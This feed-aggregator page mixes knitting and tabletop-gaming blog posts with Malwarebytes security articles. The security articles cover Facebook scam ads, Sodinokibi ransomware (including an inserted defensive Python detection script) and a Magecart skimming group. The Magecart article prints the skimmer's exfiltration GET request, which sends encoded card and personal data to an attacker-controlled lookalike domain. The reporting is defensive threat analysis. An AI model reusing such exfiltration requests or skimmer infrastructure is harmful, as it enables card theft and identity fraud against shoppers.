Feed aggregator

Briefly in a Lake

Yarn Harlot - Fri, 07/19/2019 - 18:46

I am trudging along here – still looking forward (rather desperately) to the day (28 days) from now when the Bike Rally is finished and things shift around here.  I am not even sure what I will do that day, though I’ve reached a phase of hopefulness where I start piling knitting projects up around the house so I can look at them as I walk by. I can only imagine that August 17th is a day that the Wild Knitting Rumpus will begin, assuming I am conscious.  Between now and then I’m trying to get all this done without completely compromising my sanity, family or what’s left of my relationships. (I have given up on the house, but have adopted AlisonH’s tip for floor cleaning from the comments on the last post, so things are better there.)  Last week some friends invited us up to their cottage, and my love for the Canadian wilds being what it is, I managed to find a way to get myself up there on short notice for three glorious days.  (Joe,  Megan and Elliot managed to stay up there longer, but I jumped on the train bright and early on Thursday for a series of Bike Rally Meetings that couldn’t be missed. You can only imagine the bitterness I felt leaving that kid behind in one of my favourite places.)

We spent the few days I was able to be there swimming, trying to convince Elliot to go in the lake (he was fine by the end, but resistance was initially high) and I tried to write to you, but I had to use nap time for Rally Business, and usually if he’s awake and we’re together, Elliot says “Gammy?” every 12 seconds, and I am helpless not to answer him.  I wanted to write and say that despite the state of my life (and improved status of the kitchen floor) I did finish my June Socks, and I had a good enough time knitting them that I’d happily start the pair over.

Pattern is Paragon Socks, Yarn is West Yorkshire Spinners Signature 4 ply in Cardamom.

They look fussier than they are to knit, which is something I like a lot in a pair of socks, and the pattern itself was memorizable (though not until the last repeat of the second sock, in my case, but if your head isn’t full of Bike Rally you might have more room for storing that).

I’d tell you I loved the yarn too- but that should be obvious by now, since I think it’s turned up on the blog about three times in the last year or so.  Great stuff.

I’ve got the next pair of socks on the needles, but they’re just plain self-striping, because I see how things are this month and wanted to make it a little easier on myself.  (I can see now that this would have been a good month to investigate the perplexing world of hand knit ankle socks, but it’s too late now.) I finished the mini-pom-pom neck thing too, so I’ll get some pictures of that, and look! While I was walking around another pair of socks fell off the needles.

Yarn is Cozy Knitter’s “Celebrate the Night” (I think. I’ve misplaced the ball band again, which isn’t surprising since I can’t even remember when I started these, never mind anything else about them.)

Absolutely no pattern whatsoever, I just banged them out. Top down,  round and round, 2.25mm needles, 68 stitches, German short row heels over half the stitches, and my standard toe. (My standard toe probably isn’t yours because I’m opposed to the pointiness, we can talk about it another time.)

Into the long range planning box for them- it’s actually not looking too shabby in there, I remember the last time I did the Self-imposed-sock-of-the-month-club it was an easy Christmas, I was so far ahead. It’s a lovely thing to think about, since I’m so far behind on everything else right now.

Speaking of behind -let’s get some Karmic Balancing gifts done, because you all are amazing.  Team Knit is still inching towards their goals, and it’s you all we have to thank for it.  I  hope we’re going to make it. If you’re wondering what’s going on here read this:  and Team Knit this year is Me, Ken, Cameron and Pato. Please help us spread the word.

First, a wonderful gift from Tanja Luescher, she’s a designer who’s always one of the first in my inbox with an offer to help. (We’ve never met, but I think she’s pretty great.)

Tanja is offering 10 ebooks (20 really, but we’ll do another 10 another time). Kathryn, Sonja, Rita, Karen, Janis, Sarah, Susanna, Cara, Jessica, and Kelly can all choose between Stories of Inspiration, Selfstriping, Hubby needs Socks, The Cat Collection OR these lucky knitters can create their own ebook of any 7 patterns.  Thanks all. (And I am going to buy the socks one. I think I found the perfect pair.)

Michele wrote and said that she has three gorgeous gifts that need new homes – thanks Michele! Violets by Mary Scott Huff – the entire kit. (Michele loves this a lot, but is a realist about its future with her. I hope that Barbara M loves it and has time.) 1 skein (1000 yards) of Tanis Fiber Arts pink label lace weight – variegated graphite is the colourway. Michele found out she’s not a fan of laceweight – so off it goes to Tamara G. 2 skeins (420 yards each) of Tanis Fiber Arts red label cashmere/silk twist – mauve blossoms. (Michele didn’t say why these need rehoming, so I assume it’s straight-up crazy generosity.)  Good news Sarah H, these are winging your way!

Mary E Rose is another designer, and Mary’s written to say that she’d like to give away a free pattern to TEN knitters.  I spent some time with her portfolio, and Smocked Leaves and The White Queen’s Shawl are two I’m putting in my queue.

Good luck choosing to  Lesley E, Brooke S, Wendy N, Dari T, Amanda G, Christine E, Nancy S, Kathy F, Sam M, and Cathy W. There’s a lot of amazing patterns there.

Christina has these three beautiful skeins of Titus (in Coal) to give away.  (What a neat yarn, 50% Wensleydale, 20% BFL, and 30% alpaca – most of that from the UK.)

Those three beauties will be making their way to Lisa H. Lisa and Christina, thank you!

Terry’s got two skeins of Knitpicks Hawthorne Fingering in Burnside that she’d rather inexplicably like to give up. (Must be just that she’s nice.)

That’s more than 600m of amazing that will be making its way to Julie A.

But wait there’s more! Brooke’s got two skeins of Three Irish Girls Yarn ‘Adore’ sock yarn, in the ‘Everlasting Gobstopper’ colourway, making its way from her house to Josephine P’s. I hope it makes her happy.

Still on the sock yarn train, Linda H has two ever so pretty ones – Sweet Skein o-Mine, in the colourway St. Andrew’s Summer – headed to Cathy A. Thanks both!

That’s it for today, a whole whack of gifts done, and I’ve emailed the 27 lucky winners, and the generosity in my inbox overfloweth.  There’s much more to come.  For now, I’m off to look over about 7 spreadsheets that contain more details about a small moving city of cyclists than anyone could ever hope to memorize, and hope to drill enough parts of it into my head to get this thing off the ground. Oh. I also have to figure out the cutlery.  Who knew?

Categories: Knitting Feeds

Thralls of the Faceless Lord - Some Thoughts On The Lowly Gelatinous Cube & Its Kin

Swords & Stitchery - Fri, 07/19/2019 - 17:50
The other day I was reading through the Advanced Dungeons & Dragons 1st edition Monster Manual & came upon the gelatinous cube entry. Every single dungeon that I've played in has had a gelatinous cube or some variety of that monster within it. Why?! Every dungeon or wizard's tower seems to have one to clean up the remains of adventurers. They are hyper efficient at what they do. They
Categories: Tabletop Gaming Blogs

[MODULE] The Nocturnal Table (NOW AVAILABLE!)

Beyond Fomalhaut - Fri, 07/19/2019 - 16:28
The Nocturnal Table
I am happy to announce the publication of The Nocturnal Table, a 60-page game aid dedicated to city-based adventures, lavishly illustrated by Matthew Ray (cover), Peter Mullen, Stefan Poag and Denis McCarthy. Originally conceived in 2010 as an article for Knockspell Magazine (but only published in the Hungarian), the supplement has since gone through a lot of active play over multiple campaigns, and been expanded with additional material to offer a handy guide to design and run adventure scenarios in a large, sinful city filled with action and intrigue. This is a game aid designed for regular table use, and formatted to be comfortable and accessible. Whether your pick is Lankhmar, the City State, the City of Vultures or Imperial Rome, this supplement will help generate much of the texture of the streets – from illicit warehouses to the monsters and madmen who prowl the night! Citing the back cover…
“The City is a maze. A labyrinth of alleyways, plazas, shortcuts and hidden thoroughfares, it isn’t any less treacherous to navigate than a dungeon. At least during the day, the worst one can expect is a greedy patrol of guards eager for a shakedown, or a thief in the crowd, ready to make a grab and run for it. At night, the sensible and the timid hurry home and bolt their doors. Ecstatic revellers, madmen, assassins, religious fanatics, thrill-seekers, enigmatic apparitions and tiger-headed opium nightmares prowl the streets. And the guards are still not helping. 
The Nocturnal Table is a supplement intended to bring you this city by way of an encounter system, random inspiration tables, NPC and monster statistics, as well as a giant nighttime random encounter table, whose three hundred entries can serve as interludes as well as springboards for complicated investigative scenarios and fantastic conspiracies.”
At the core of The Nocturnal Table is a 300-entry table of random encounters and odd events you can run into at night in a busy fantasy metropolis. From a patrol of guards carrying a slain comrade, to a sinister beggar-catcher soliciting the aid of dishonest adventurers, or a skeleton covered in grey ooze, its eyes glittering gemstones shambling towards the party, all the wonder and menace of a city-crawl are at hand. But that is not all. With The Nocturnal Table, you can…
  • …create general encounters with the aid of a comprehensive encounter system. A caravan in Hightown threatening the party? Six jackalweres offering secret information near the port at night? Or a magic-user accusing a PC in the bazaars? That could be the beginning of a story (or the end of one).
  • …generate merchants selling strange and fantastic goods (as seen in Echoes From Fomalhaut #01 – that table would have been a crime not to reprint here). Is that jovial guard selling weapons as a form of bait? Are that credible horseman’s sugared fruits really from a foreign dimension?
  • …find out what’s in their pockets. The guard came up with a pouch of 12 gold and a folded hood, but that horseman? His 50 silver, 5 electrum and 10 gp was also accompanied by a weird diagram.
  • …generate local colour on the fly. Ominous, gurgling pipes overhead? A drunk who insists he has just seen a party member go the same way “just a while ago”?
  • stock warehouses with exotic goods to plunder! Leave those odd, primitive swords and the rustic carpets collecting dust in the corner, and find out how much those ceremonial globes may be worth.
  • …and set up secret meetings and investigation sites. The meeting will take place behind the old, crumbling mosaic – but don’t touch the drink. And the trail leads on, by the sign near the mortuary… just take care: the children are spies!
Guidelines are also offered to re-use the encounters and chart contents for the construction of bizarre plotlines and sinister conspiracies which rule from the shadows… while the City sleeps (these guidelines have been previewed on this blog). All that, and more are at your disposal in… The Nocturnal Table!
The print version of the supplement is available from my Bigcartel store; the PDF edition will be published through DriveThruRPG with a few months’ delay. As always, customers who buy the print edition will receive the PDF version free of charge.
Do note that a flat shipping fee is in effect: you will pay the same whether you order one, two, or more items (larger orders may be split into multiple packages and shipped individually – this does not affect the shipping fee).
Categories: Tabletop Gaming Blogs

Classic D&D, Weapons.

Bat in the Attic - Fri, 07/19/2019 - 16:03
My friend Chris over on Clash of Spear on Shield talks about Sling damage versus Large creature. Particularly how sling damage increases versus large damage and how he finds issues with that idea.

Which leads to a wider question of the consequences of the different options for modelling weapons, injury, and armor class in various editions of classic DnD.

Recap
In Chainmail man-to-man combat, the odds of an opponent being killed were found on a chart cross-indexing weapon versus a specific type of armor. You rolled that number or higher on 2d6 and the target was killed.

This element was not in the original release of the 3 LBB (Little Brown Books) but worked its way in with the release of Greyhawk. There it was presented as a weapon versus AC chart. Using the chart would result in a modifier (or not) to your to-hit roll if you were using that weapon versus that armor.

The chart is derived from the man-to-man chart in Chainmail. Basically, an 8 or better to hit was a +0 modifier and the rest were calculated from there, although Gygax tweaked the numbers, as it doesn't quite line up with the man-to-man chart.

Greyhawk also saw the introduction of variable weapon damage where each weapon used a different dice and/or modifier. Along with a different set of damage for large creatures.

Finally, in ADnD we see weapon length, weapon space requirement, and weapon speed factors. Weapon length explicitly defined how far an opponent can be attacked, and weapon space defines how small of a space a weapon can be used effectively. Weapon Speed factors only came into play if initiative was tied and could result in multiple attacks for the wielder of the weapon.

The State of the Mechanics
Not all of these mechanics found their way into people's campaigns, either back then or today. Of these, varying weapon damage is the one that is most commonly used. A different set of damage versus large creatures is not found as often. Weapon Length is sometimes a factor, especially if the weapon is clearly a polearm meant to be used in the 2nd rank or further back. Weapon space requirements are also run on an ad-hoc basis.

Weapon versus AC may be a little less popular than Weapon Speed Factor but not by much. Both are generally not used. Weapon vs AC involves yet another chart lookup, and Weapon Speed Factor was part of an initiative system so poorly understood that there are two separate interpretations and multiple-page documents attempting to explain them.

My Take
So when it comes to my Majestic Fantasy Rules, my reasoning was as follows. The core of combat is the to-hit roll versus Armor Class. It bundles actual contact with overcoming the armor into a single roll and is an essential part of how classic editions work.

I think varying weapon damage is the way to go. Injury is caused by force. Force is determined by mass times acceleration. Different weapons have different masses and are designed differently to channel that mass into force. So varying the damage dice for different weapons is a good way to model this without getting overly complex.

Because damage is a result of force, which equals mass times acceleration, it doesn't make sense to me to vary damage for large creatures. Instead, a more straightforward method is to give them more hit points or hit dice to represent their increased mass. Luckily classic DnD is consistent with this with the various giant versions of creatures, so I don't have to do any work in this regard.

As for weapon speed, I prefer individual initiative where everybody rolls 1d6 plus bonuses. High roll has the option of acting first. The classic weapon speed mechanic has little relevance for me as it is tied tightly to the ADnD initiative system.

While I think that Weapons versus AC is one chart too many, I think the concept is sound. Different weapons are designed differently and some are more effective than others against certain types of armor. Despite the abstract nature of classic edition combat, it is at a level where I think a light touch would add something to combat.

I opted to handle this by noting any special bonuses in the description of the weapon. For example, maces get +1 to hit versus opponents wearing chainmail or gelatinous creatures like ochre jellies or black puddings.

This method allowed me to add other interesting attributes to weapons with a similar light touch. For example, an axe can be used to pin a weapon if the opponent fails their saving throw. Something I learned from reading how axes were used throughout history. Typically this is followed up by a blow from the shield or a takedown after grappling with the opponent.

You can read my take with either of the following two free downloads.

The Majestic Fantasy Basic Rules
The Majestic Fantasy Equipment Rules
Categories: Tabletop Gaming Blogs

Beer Growler Cozy

Moogly - Fri, 07/19/2019 - 15:05

The Beer Growler Cozy makes a great gift for beer lovers, summer or winter – you might just have to make a few of this free crochet pattern on Moogly! Disclaimer: This post includes affiliate links; materials provided by Red Heart and Clover USA. What is a Beer Growler? A growler is (usually) a glass...

Categories: Crochet Life

New Facebook ad reporting tool launches in UK

Malwarebytes - Fri, 07/19/2019 - 15:00

Last year, well-known consumer advice expert Martin Lewis decided to take Facebook to court for defamation. The cause? Multiple bogus adverts placed on the social network featuring his likeness, appearing via the ad network Outbrain.

As a trusted face in consumer causes, scammers bolting Lewis’ face onto rogue ads would always be a money spinner. This would, of course, have the knock-on effect of potentially damaging his reputation, especially with tales of victims losing as much as £100,000.

By the time he’d seen around 50 advertisements promoting various Bitcoin scams, enough was enough—especially as he felt reporting the ads got him nowhere.

Making bogus ads for fun and profit

Regular readers will no doubt be familiar with these types of bogus ads hawking swiped images of trusted individuals. It’s essentially the same as we saw a while back on compromised profile pages, all promoting some wonderful new money-making scheme courtesy of Ellen. However you stack it up, people are out of pocket.

In Lewis’ case, some of the ads looked like they were from British newspapers, or other established news sources. Many offered up the usual social engineering tactic of a ticking timer: “Get this offer soon before it runs out!” Work-from-home riches, revolutionary opportunities, making huge amounts from “small” investments—every sleazy claim you could imagine was present and accounted for, and they were all situated next to or above Lewis looking enthusiastic (and talking about something utterly unrelated).

Facebook banned crypto-themed ads, but these Lewis-themed efforts simply replaced pictures of Bitcoin with pictures of him and sent them to cryptocurrency sites elsewhere. The Lewis ads in question were centered on incredibly dubious binary trading scams.

What is binary trading?

It’s a risky form of fixed-odds betting. You either win or you lose. Win, and you get a bump in your coffers. Lose, and you lose everything. Binary options are not allowed in the EU, which means scammers set up shop outside its borders, claim to have a base of operations in places like London and Paris, and set to work with slick, convincing adverts. As the FCA advice notes, some scammers will even manipulate the numbers in front of potential victims before swiping all the cash and vanishing into the night.

So it is into this maelstrom of potentially damaged reputations, bogus adverts, and incredibly devastating fake Bitcoin scams that Lewis and Facebook went into battle. With what he felt was a lack of responsiveness over the course of a year, off he went to try and get something done about it.

Closing time for bad ads?

In January 2019, Lewis agreed to settle out of court. By this point, Facebook had admitted there’d been “thousands” of these ads across the site. The legal settlement relied on the conditions that Facebook would donate £3 million to Citizens Advice to create a UK Scams Action Project, and that it would also launch a UK-centric scam ad reporting tool complete with a dedicated team. The donation would take the form of £2.5 million in cash over two years, with the other £500,000 covering Facebook ads presumably promoting the new services.

https://youtu.be/xxv0izTxrjg

We have lift-off

A little later than previously advertised, the wheels have finally turned and the promises listed above have turned into tangible reality. Not only is the Scams Action page live, the rogue ad report tool is also active in the UK. Reporting an ad takes a few steps, but is clearly an improvement on no tool at all. Reporting is a case of clicking the dots above any ad, and selecting the appropriate options before sending.

There’s never been a better time to start reporting bogus ads on Facebook. If you see something that looks suspicious, by all means file a report and do your bit to help keep the most vulnerable online away from potentially life-ruining scams.

Categories: Techie Feeds

3 Things to Expect as a Beginner in Aikido

Aikido Blogs - Fri, 07/19/2019 - 14:37
Just finished uploading my latest vlog to YouTube. It's about the 3 things you can expect as a beginner in Aikido.

Click Here and Please take a look, comment, share and subscribe to my channel!


Categories: Aikido

Save or Die! Podcast #154

Zenopus Archives - Fri, 07/19/2019 - 13:43


I recently had the pleasure of returning as a guest on the podcast Save or Die!, this time with DMs Carl, Courtney and Chrispy, and it is now available for listening:
Save or Die! Adventure 154 - Holmes Basic
"The three hosts are together again in the latest Save Or Die! where we talk Holmes Basic with our guest the Arch Zenopus himself Zach of the Zenopus Archives. A SOD favorite gets reexplored as we take a deep dive into what makes Holmes Basic such an endearing part of D&D history."

Also, don't miss the Actual Play of the dungeon run by Carl, the first part of which is at the end of the episode (I'm not part of this).

Links for Further Reading on Topics Discussed on the Show:

The Warlock D&D Rules

Holmes Manuscript Part 3: "Elves Muse Decide"

Holmes Manuscript Part 16, covering attacks per round in combat

Holmes Manuscript Part 10, section on Magic Missile

Holmes Manuscript Part 17, section on The Parry

Article on origins of the Ochre Jelly and Blob

Summary of Tolkien References in the Blue Book

Holmes Manuscript Part 19: "If One Wanted to Use a Red Dragon..."

Holmes Manuscript Part 46: "Zenopus Built a Tower": intro to the Sample Dungeon

Zenopus Dungeon Factions, including the Thaumaturgist

Article in a New Cthulhu Zine, Bayt Al Azif issue #1

The Tower of Zenopus in Ghosts of Saltmarsh


Earlier Save or Die episodes that may be of interest:

Side Adventure 20: NTRPGCon Wrap Up 6/14/19 --- at 17:30 Carl talks about how I guested as his version of Zenopus in his Sat night Discos & Dragons game

Side Adventure 16: Favorite Boxed Set 1/7/19 --- at 8:50 Carl talks about Holmes Basic and mentions this site

Side Adventure 14: House Rules! with guest Chris Holmes 10/6/18

Episode 124: Save vs. Zenopus 7/17/16 --- my previous occasion as guest

Adventure 136: Michael Thomas on Journeymanne Rules 5/16/17

Side Adventure 12: J. Eric Holmes Seminar NTRPGCon 8/14/16 --- Audio recording of a  panel with Chris Holmes, Allan Grohe & myself 

Episode 122: Save vs. Chris Holmes 5/11/16

Episode 117: Save vs. Blueholme 11/16/15 --- guest Michael Thomas

Categories: Tabletop Gaming Blogs

Link Love: My Favourite Things Things Week

Knitted Bliss - Fri, 07/19/2019 - 11:00

My Favourite Articles and Links This Week

Oh my gosh- did you hear about Finland’s heavy metal knitting championship?! You have to see this. I just heard about an amazing website that helps you figure out all the ways you can get from Point A to Point B– flights, trains, buses, cars. With estimated costs

Categories: Knitting Feeds

Omniverse: Incumbents are from Earth, Sivanas are from Venus

Sorcerer's Skull - Fri, 07/19/2019 - 11:00

In September of 1936, all across America aircraft began dropping flyers proclaiming a new candidate for the highest office in the land. At the urging of her father, Beautia Sivana was running for President. Thaddeus Bodog Sivana planned to stage a coup once his daughter was in office. Hers was the most massive, multi-media, write-in campaign this country has ever seen. Her beautiful visage graced the covers of magazines and full page newspaper ads. Her captivating voice could be heard on radio addresses. Women were cool to her candidacy, but men were enthralled. Most men. Boy reporter, Billy Batson, wasn’t fooled one bit. His alter ego, Captain Marvel foiled the Sivanas’ plot and returned mad scientist and would-be president to Venus*, where Beautia would have to content herself with being Empress.

Ultimately, Beautia didn’t share her father’s devotion to evil and in fact pursued a career in social work upon her return to Earth, according to some accounts.

*Or what Sivana said was Venus. It is difficult to square the real planet with its depiction in this record.

Shooting fish in an OSR barrel - Some Guidelines In the Table Top Hobby & the OSR

Swords & Stitchery - Fri, 07/19/2019 - 03:14
One of the things that I really miss about the world without the internet was the scale of TSR back in the classic days. If you were lucky enough to find a Dragon magazine at the local street level then it was a gateway to world that someone in small town New England America at eight or nine didn't know anything about. Gary Gygax is someone that I knew only in passing & having talked with at
Categories: Tabletop Gaming Blogs

'Playing With The OSR' Using & Abusing OSR Systems & Adventures For Campaign Use

Swords & Stitchery - Thu, 07/18/2019 - 18:40
Alright so I've been getting a bit of heat about the fact that the last blog post used classic original Dungeons & Dragons & Advanced Dungeons & Dragons books with both Godbound & Stars Without Number. Many of the main line OSR retroclone systems will work with the Sine Nomine Publishing lines of games. Why?! None of that really matters by comparison to say Godbound or Stars Without Number.
Categories: Tabletop Gaming Blogs

Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void

Malwarebytes - Thu, 07/18/2019 - 17:58

Sodinokibi ransomware, also known as Sodin and REvil, is hardly three months old, yet it has quickly become a topic of discussion among cybersecurity professionals because of its apparent connection with the infamous-but-now-defunct GandCrab ransomware.

Detected by Malwarebytes as Ransom.Sodinokibi, Sodinokibi is a ransomware-as-a-service (RaaS), just as GandCrab was, though researchers believe it to be more advanced than its predecessor. We’ve watched this threat target businesses and consumers equally since the beginning of May, with a spike for businesses at the start of June and elevations in consumer detections in both mid-June and mid-July. Based on our telemetry, Sodinokibi has been on the rise since GandCrab’s exit at the end of May.

Business and consumer detection trends for Sodin/REvil from May 2019 until present

On May 31, the threat actors behind GandCrab formally announced their retirement, detailing their plan to cease selling and advertising GandCrab in a dark web forum post.

“We are leaving for a well-deserved retirement,” a GandCrab RaaS administrator announced. (Courtesy of security researcher Damian on Twitter)

While many may have heaved sighs of relief at GandCrab’s “passing,” some expressed skepticism over whether the team would truly put behind their successful money-making scheme. What followed was bleak anticipation of another ransomware operation—or a re-emergence of the group peddling new wares—taking over to fill the hole GandCrab left behind.

Enter Sodinokibi

Putting a spin on an old product is a concept not unheard of in legitimate business circles. Often, spinning involves creating a new name for the product, some tweaking of its existing features, and finding new influencers—“affiliates” in the case of RaaS operations—to use (and market) the product. In addition, threat actors would initially limit the new product’s availability and follow with a brand-new marketing campaign—all without touching the product standard. In hindsight, it seems the GandCrab team has taken this route.

A month before the GandCrab retirement announcement, Cisco Talos researchers released information about their discovery of Sodinokibi. Attackers manually infected the target server after exploiting a zero-day vulnerability in its Oracle WebLogic application.

To date, six versions of Sodinokibi have been seen in the wild.

Sodinokibi versions, from the earliest (v1.0a), which was discovered on April 23, to the latest (v1.3), which was discovered July 8

Sodinokibi infection vectors

Like GandCrab, the Sodinokibi ransomware follows an affiliate revenue system, which allows other cybercriminals to spread it through several vectors. Their attack methods include:

  • Active exploitation of a vulnerability in Oracle WebLogic, officially named CVE-2019-2725
  • Malicious spam or phishing campaigns with links or attachments
  • Malvertising campaigns that lead to the RIG exploit kit, an avenue that GandCrab used before
  • Compromised or infiltrated managed service providers (MSPs), which are third-party companies that remotely manage the IT infrastructure and/or end-user systems of other companies, to push the ransomware en masse. This is done by accessing networks via Remote Desktop Protocol (RDP) and then using the MSP console to deploy the ransomware.

Although affiliates used these tactics to push GandCrab, too, many cybercriminals—nation-state actors included—have done the same to push their own malware campaigns.

Symptoms of Sodinokibi infection

Systems infected with Sodinokibi ransomware show the following symptoms:

Changed desktop wallpaper. Like any other ransomware, Sodinokibi changes the desktop wallpaper of affected systems into a notice, informing users that their files have been encrypted. The wallpaper has a blue background, as you can partially see from the screenshot above, with the text:

All of your files are encrypted!
Find {5-8 alpha-numeric characters}-readme.txt and follow instructions

Presence of ransomware note. The {5-8 alpha-numeric characters}-readme.txt file it’s referring to is the ransom note that comes with every ransomware attack. In Sodinokibi’s case, it looks like this:

The note contains instructions on how affected users can go about paying the ransom and how the decryption process works.

Screenshot of the TOR-only accessible website Sodinokibi victims were told to visit to make their payments

Encrypted files with a 5–8 character extension name. Sodinokibi encrypts certain files on local drives with the Salsa20 encryption algorithm, with each file renamed to include a pre-generated, pseudo-random alpha-numeric extension that’s five to eight characters long.

The extension name and character string included in the ransom note file name are the same. For example, if Sodinokibi has encrypted an image file and renamed it to paris2017.r4nd01, its corresponding ransom note will have the file name r4nd01-readme.txt.
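A triage check built on this naming rule, as an added example that is not part of the original post: it pairs every `{5-8 alphanumeric}-readme.txt` note in a file listing with files carrying the same string as their extension. The sample listing is constructed, and the function name and the `min_files` threshold are assumptions.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Ransom note name as described above: {5-8 alphanumeric characters}-readme.txt
NOTE_RE = re.compile(r"^([a-z0-9]{5,8})-readme\.txt$", re.IGNORECASE)

# Constructed file listing (e.g. output of a recursive directory walk).
SAMPLE_LISTING = [
    r"C:\Users\alice\Pictures\paris2017.r4nd01",
    r"C:\Users\alice\Pictures\rome2018.r4nd01",
    r"C:\Users\alice\Pictures\r4nd01-readme.txt",
    r"C:\Users\alice\Documents\r4nd01-readme.txt",
    r"C:\Users\alice\Documents\budget.xlsx",
    r"C:\Projects\tool\docs-readme.txt",   # benign: prefix is only 4 characters
    r"C:\Projects\tool\setup-readme.txt",  # benign: no files end in .setup
]

def find_sodinokibi_naming(paths, min_files=2):
    """Return {extension: {"notes": [...], "files": [...]}} for each candidate
    extension that has a matching ransom note AND at least min_files files."""
    notes = defaultdict(list)
    by_ext = defaultdict(list)
    for raw in paths:
        p = PureWindowsPath(raw)          # parses Windows paths on any OS
        m = NOTE_RE.match(p.name)
        if m:
            notes[m.group(1).lower()].append(raw)
            continue
        ext = p.suffix[1:].lower()
        if ext:
            by_ext[ext].append(raw)
    hits = {}
    for ext, note_paths in notes.items():
        files = by_ext.get(ext, [])
        # A note name alone is weak evidence; require files with the same extension.
        if len(files) >= min_files:
            hits[ext] = {"notes": sorted(note_paths), "files": sorted(files)}
    return hits

if __name__ == "__main__":
    for ext, hit in find_sodinokibi_naming(SAMPLE_LISTING).items():
        print(f".{ext}: {len(hit['files'])} renamed files, {len(hit['notes'])} notes")
```

Requiring both halves of the pattern keeps ordinary `*-readme.txt` files from raising alerts on their own.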

Sodinokibi looks for files that are mostly media- and programming-related, with the following extensions to encrypt:

  • .jpg
  • .jpeg
  • .raw
  • .tif
  • .png
  • .bmp
  • .3dm
  • .max
  • .accdb
  • .db
  • .mdb
  • .dwg
  • .dxf
  • .cpp
  • .cs
  • .h
  • .php
  • .asp
  • .rb
  • .java
  • .aaf
  • .aep
  • .aepx
  • .plb
  • .prel
  • .aet
  • .ppj
  • .gif
  • .psd

Deleted shadow copy backups and disabled Windows Startup Repair tool. Shadow copy (also known as Volume Snapshot Service, Volume Shadow Copy Service, or VSS) and Startup Repair are technologies inherent in the Windows OS. The former is “a snapshot of a volume that duplicates all of the data that is held on that volume at one well-defined instant in time,” according to Windows Dev Center. The latter is a recovery tool used to troubleshoot certain Windows problems.

Deleting shadow copies prevents users from restoring from backup when they find their files are encrypted by ransomware. Disabling the Startup Repair tool prevents users from attempting to fix system errors that may have been caused by a ransomware infection.

Other tricks up Sodinokibi’s sleeve

Ransomware doesn’t normally take advantage of zero-day vulnerabilities in its attacks, but Sodinokibi is not your average ransomware. It takes advantage of an elevation-of-privilege zero-day vulnerability in the Win32k component file in Windows.

Designated as CVE-2018-8453, this flaw can grant Sodinokibi administrator access to the endpoints it infects. This means that it can conduct the same tasks as administrators on systems, such as disabling security software and other features that were meant to protect the system from malware.

CVE-2018-8453 was the same vulnerability that the FruityArmor APT exploited in its malware campaign last year.

New variants of Sodinokibi have also been found to use “Heaven’s Gate,” an old evasion technique used to execute 64-bit code in a 32-bit process, which allows malware to run without getting detected. We touched on this technique in early 2018 when we dissected an interesting cryptominer we captured in the wild.

Protect your system from Sodinokibi

Malwarebytes tracks Sodinokibi campaigns and protects premium consumer users and business users with signature-less detection, nipping the attack in the bud before the infection chain even begins. Users of our free version are not protected from this threat without real-time protection.

We recommend consumers take the following actions if they are not premium Malwarebytes customers:

  • Create secure backups of your data, either on an external drive or on the cloud. Be sure to detach your external drive from your computer once you’ve saved all your information, as it, too, could be infected if still connected.
  • Run updates on all your systems and software, patching for any vulnerabilities.
  • Be aware of suspicious emails, especially those that contain links or attachments. Read up on how to detect phishing attempts both on your computer and your mobile devices.

To mitigate on the business side, we also recommend that IT administrators do the following:

  • Deny public IPs access to RDP port 3389.
  • Replace your company’s ConnectWise ManagedITSync integration plug-in with the latest version before reconnecting your VSA server to the Internet.
  • Block SMB port 445. In fact, it’s sound security practice to block all unused ports.
  • Apply the latest Microsoft update packages.
  • In this vein, make sure all software on endpoints is up-to-date.
  • Limit the use of system administration tools to IT personnel or only those employees who need access.
  • Disable macros in Microsoft Office products.
  • Regularly inform employees about threats that might be geared toward the organization’s industry or the company itself with reminders on how to handle suspicious emails, such as avoiding clicking on links or opening attachments if they’re not sure of the source.
  • Apply attachment filtering to email messages.
  • Regularly create multiple backups of data, preferably to devices that aren’t connected to the Internet.

Indicators of compromise (IOCs)

File hashes:

  • e713658b666ff04c9863ebecb458f174
  • bf9359046c4f5c24de0a9de28bbabd14
  • 177a571d7c6a6e4592c60a78b574fe0e

Stay safe, everyone!

The post Threat Spotlight: Sodinokibi ransomware attempts to fill GandCrab void appeared first on Malwarebytes Labs.

Categories: Techie Feeds

No man’s land: How a Magecart group is running a web skimming operation from a war zone

Malwarebytes - Thu, 07/18/2019 - 15:00

Our Threat Intelligence team has been monitoring the activities of a number of threat actors involved in the theft of credit card data. Often referred to under the Magecart moniker, these groups use simple pieces of JavaScript code (skimmers) typically injected into compromised e-commerce websites to steal data typed by unaware shoppers as they make their purchase.

During the course of an investigation into one campaign, we noticed the threat actors had taken some additional precautions to avoid disruption or takedowns. As such, we decided to have a deeper look into the bulletproof techniques and services offered by their hosting company.

What we found is an ideal breeding ground where criminals can operate with total impunity from law enforcement or actions from the security community.

The setup

Using servers hosted in battle-scarred Luhansk (also known as Lugansk), Ukraine, Magecart operators are able to operate outside the long arm of the law to conduct their web-skimming business, collecting a slew of information in addition to credit card details before it is all sent to “exfiltration gates.” Those web servers are set up to receive the stolen data so that the cards can be processed and eventually resold in underground forums.

We will take you through analysis of the skimmer, exfiltration gate, and hosting servers to show how this Magecart group operates, and which measures we are taking to protect our customers.

Skimmer analysis

The skimmer is injected into compromised Magento sites and tries to pass itself off as Google Analytics (google-anaiytic[.]com), a domain previously associated with the VisionDirect data breach.

Each hacked online store has its own skimmer located in a specific directory named after the site’s domain name. We also discovered a tar.gz archive, perhaps left behind by mistake, containing the usernames and passwords needed to log in to hundreds of Magento sites. These are the same sites that have been injected with this skimmer.

Looking for additional OSINT, we were able to find a PHP backdoor that we believe is being used on those hacked sites. It includes several additional shell scripts and perhaps skimmers as well (snif1.txt):

In the next step of our analysis, we will be looking at the exfiltration gate used to send the stolen data back to the criminals. This is an essential part that defines every skimmer and can help us better understand their backend infrastructure.

Exfiltration gate

A closer look at the skimmer code reveals the exfiltration gate (google.ssl.lnfo[.]cc), which is another Google lookalike.

The stolen data is Base64 encoded and sent to the exfiltration server via a GET request that looks like this:

GET /fonts.googleapis/savePing/?hash=udHJ5IjoiVVMiLCJsb2dpbjpndWVzdCXN0Iiw{trimmed}

The crooks will receive the data as a JSON file where each field contains the victim’s personal information in clear text:

The primary target here is the credit card information that can be immediately monetized. However, as seen above, skimmers can also collect much more data, which unlike requesting a new credit card, is much more problematic to deal with. Indeed, names, addresses, phone numbers, and emails are extremely valuable data points for the purposes of identity theft or spear phishing attacks.
